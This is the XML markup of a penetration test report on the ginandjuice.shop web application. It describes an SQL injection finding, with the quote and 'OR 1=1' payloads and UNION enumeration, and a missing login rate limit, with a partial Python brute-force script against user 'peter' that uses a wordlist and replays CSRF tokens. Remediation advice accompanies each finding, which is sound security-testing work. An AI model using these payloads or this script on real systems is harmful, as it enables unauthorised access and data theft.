              <w:t>CWE-89: Improper Neutralization of Special Elements used in an SQL Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="4965E7BE"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569FEE0D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL</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507C3E11" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://ginandjuice.shop/catalog?category=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65784E7F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53683C3F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DC1C1E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The `category` query parameter on the product catalog endpoint is concatenated directly into a backend SQL que</w:t>
      </w:r>
      <w:r>
        <w:t>ry without proper sanitization or parameterization. This allows an attacker to inject arbitrary SQL syntax and manipulate the query's logic, enumerate database schema, and potentially extract or modify data outside the intended scope of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772FA5ED" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>oof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FD7F0A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Submitting a single quote character in the category parameter (category=') caused the application to return an HTTP 500 Internal Server Error, indicating the input broke out of the intended SQL string context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFF8BE9" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Submitting a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-based payl</w:t>
      </w:r>
      <w:r>
        <w:t>oad (category=' OR 1=1 --) caused the response size to increase from a normal baseline of 11,182 bytes to 17,854 bytes, confirming the injected condition altered the result set returned by the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A72510" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using UNION-based extraction techniques, the underlying </w:t>
      </w:r>
      <w:r>
        <w:t>database was enumerated and two accessible databases were identified: INFORMATION_SCHEMA and PUBLIC, confirming the injection point provides read access to database metadata and, by extension, application data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2145B23A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47020782" wp14:editId="33E6E337">
            <wp:extent cx="5334000" cy="2867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67025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D325A1" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 1 — Malformed query (') triggering a 500 Internal Server Error, confirming injectable input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04573AB4" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BA7786B" wp14:editId="22C366A2">
            <wp:extent cx="5334000" cy="2124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24075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2173BB1F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 2 — Enumerated databases (INFORMATION_SCHEMA, PUBLIC) via UNION-based SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE62C9" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180A0A5" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>An attacker can leverage this vulnerability to read arb</w:t>
      </w:r>
      <w:r>
        <w:t>itrary data from the application database — including customer records, order details, and potentially stored credentials — and, depending on database permissions, modify or delete records. This represents a critical risk to data confidentiality, integrity</w:t>
      </w:r>
      <w:r>
        <w:t>, and regulatory compliance (e.g., PCI-DSS, GDPR) for any production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9FBBDF" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F7435C" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Eliminate string-concatenated SQL by using parameterized queries (prepared statements) or a vetted ORM for all database access, and never build queries from raw us</w:t>
      </w:r>
      <w:r>
        <w:t>er input. Apply strict allow-list validation on the category parameter (e.g., match against a known set of valid category names) as a defense-in-depth layer, enforce least-privilege database accounts, and disable verbose error messages in production so int</w:t>
      </w:r>
      <w:r>
        <w:t>ernal query errors are not exposed to clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0093F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CF9426" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>OWASP SQL Injection Prevention Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07733C9E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>OWASP Top 10: A03:2021 – Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AE91F76" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>PortSwigger</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t xml:space="preserve"> — SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C68D633" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:before="500" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>F-02: No Rate Limiting on Login Endpoint (Credential Brute-Force)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="2200" w:type="dxa"/>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514271" w14:paraId="4610E78D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B91C1C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2CEE1E66" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="118FE46B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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7446"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514271" w14:paraId="305A5574"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583A8854" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.1 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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588CE5D7" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5 (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H — brute-force context)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="0054FC6A"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148D0FA5" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE</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029DF1E1" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-307: Improper Restriction of Excessive Authentication Attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="1F39D9B5"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57642069" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL</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373C4BEF" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://ginandjuice.shop/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0961ABFB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="030F6AA5" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017AE0BC" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The login endpoint does not implement rate limiting, account lockout, or CAPTCHA controls after repeated failed authentication attempts. The only barrier to automation is a CSRF token, which is trivially retrieved and replayed on every request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C46E4" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proof of Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ncept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C088B51" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A Python script was developed to automate credential guessing against a known username ("peter"). The script first requests the login page to extract the current CSRF token via regex, then submits username/password/CSRF combinations from a wordlist i</w:t>
      </w:r>
      <w:r>
        <w:t>n a session loop, checking for an HTTP 302 redirect (indicating successful authentication) versus a failed attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED557C6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Because no lockout, CAPTCHA, or per-IP throttling was observed, the script was able to submit password guesses in rapid succession without b</w:t>
      </w:r>
      <w:r>
        <w:t>eing blocked, demonstrating that the endpoint is vulnerable to automated brute-force and credential-stuffing attacks.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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514271" w14:paraId="0B60BDC4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
            <w:tcMar>
              <w:top w:w="160" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="19952D5C" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>import requests, re, time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF9E184" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F4D362F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>url_login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "https://ginandjuice.shop/login"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40246983" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>username = "peter"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FF0A885" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WORDLIST_PATH = r"rockyou.txt"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7DDFAA" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1DFA656F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>open(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WORDLIST_PATH, "r", encoding="utf-8", errors="ignore") as wordlist:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A1223A6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    for line in wordlist:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14EE665B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        password = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>line.strip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18D97CBD" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        if not password:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A9323AB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            continue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29CC3C20" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B2B6BC6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        session = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>requests.Session</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BD23DBB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D1FAE5"/>
